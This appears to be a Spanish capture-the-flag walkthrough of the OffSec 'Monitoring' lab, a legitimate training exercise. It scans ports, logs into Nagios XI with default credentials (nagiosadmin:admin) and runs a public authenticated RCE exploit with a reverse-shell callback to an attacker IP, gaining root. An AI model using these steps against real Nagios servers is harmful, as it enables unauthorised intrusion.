> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/proving-ground-play/monitoring.md).

# Monitoring

✍️ Autor: OffSec 🔍 Dificultad: Fácil

### 🔍 **RECONOCIMIENTO**

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 192.168.197.136
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FoEgVtsbQVA1HhSJh6KOe%2Fimage.png?alt=media&amp;token=53b72bc9-d777-4a00-8eb7-bf3b8cfdf5f6" alt=""><figcaption></figcaption></figure>

A continuación, se realiza el comando:

```bash
nmap 192.168.197.136
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1tlAArnDPEMiVBJeGSqA%2Fimage.png?alt=media&amp;token=56f885a2-01d8-46bf-a1be-3efdfaf06a86" alt=""><figcaption></figcaption></figure>

Como se puede observar durante el escaneo, los siguientes puertos se encuentran abiertos:

* **Puerto 22**, correspondiente al servicio **SSH**.
* **Puerto 25**, correspondiente al servicio **SMTP**.
* **Puerto 80**, correspondiente al servicio **HTTP**.
* **Puerto 389**, correspondiente al servicio **LDAP**.
* **Puerto 443**, correspondiente al servicio **HTTPS**.

Dado que estos servicios están accesibles, se procederá a realizar un análisis más detallado sobre cada uno de ellos con el fin de identificar posibles vectores de ataque o configuraciones incorrectas.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,25,80,389,443 -v 192.168.197.136
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F4zPqB2AkBvCZNNJOUtv7%2Fimage.png?alt=media&amp;token=f36aad59-8f65-4225-8792-57d22c9dbb8b" alt=""><figcaption></figcaption></figure>

Comprobamos el puerto 80.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FPMPFUwRIQqwIZYah4r2c%2Fimage.png?alt=media&amp;token=b483451e-db6d-4708-a8dd-4b1597f581eb" alt=""><figcaption></figcaption></figure>

Es una página de Nagios XI y al dar a acceder se nos muestra el panel de Login. Tras buscar las contraseñas por defecto nos logueamos (nagiosadmin:admin).

{% embed url="<https://bobcares.com/blog/nagios-reset-password-for-nagiosadmin/>" %}

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBdp3dubbTnE0HxblBFDy%2Fimage.png?alt=media&amp;token=b21f65c0-04e7-425f-a6b3-bfdc2b88d22f" alt=""><figcaption></figcaption></figure>

Revisando la página encontramos una versión por lo que miramos a ver si tiene un exploit.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FW6bdKqcMOkEzJBexg0ZN%2Fimage.png?alt=media&amp;token=0b2ba19c-5e18-4556-95e8-169813d93218" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Sí tiene exploit por lo que lo ejecutamos y así conseguimos una ejecución remota de código.

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_mibs_authenticated_rce/>" %}

{% @github-files/github-code-block url="<https://github.com/hadrian3689/nagiosxi_5.6.6/blob/main/exploit.py>" %}

Nos descargamos el exploit y lo ejecutamos.

```bash
python3 exploit.py -t http://192.168.197.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh 192.168.45.157-lp 4444
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FYDwsJF4cfQf8P8HrGDlT%2Fimage.png?alt=media&amp;token=9d439c46-c008-4966-948e-66b57d1d2008" alt=""><figcaption></figcaption></figure>

Mientras nos ponemos en escucha.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FK0LCU7SIpCL7vuCLHVSh%2Fimage.png?alt=media&amp;token=22d617f1-d4d0-46c8-b0e3-9a9b6b9c330d" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/#) para trabajar más cómodos.

### 🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

```bash
whoami
```

y sí somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRSsLOhnkb0P77pQ6DJAv%2Fimage.png?alt=media&amp;token=40e13a25-05e7-4ac1-8e0e-083b1dca8af1" alt=""><figcaption></figcaption></figure>
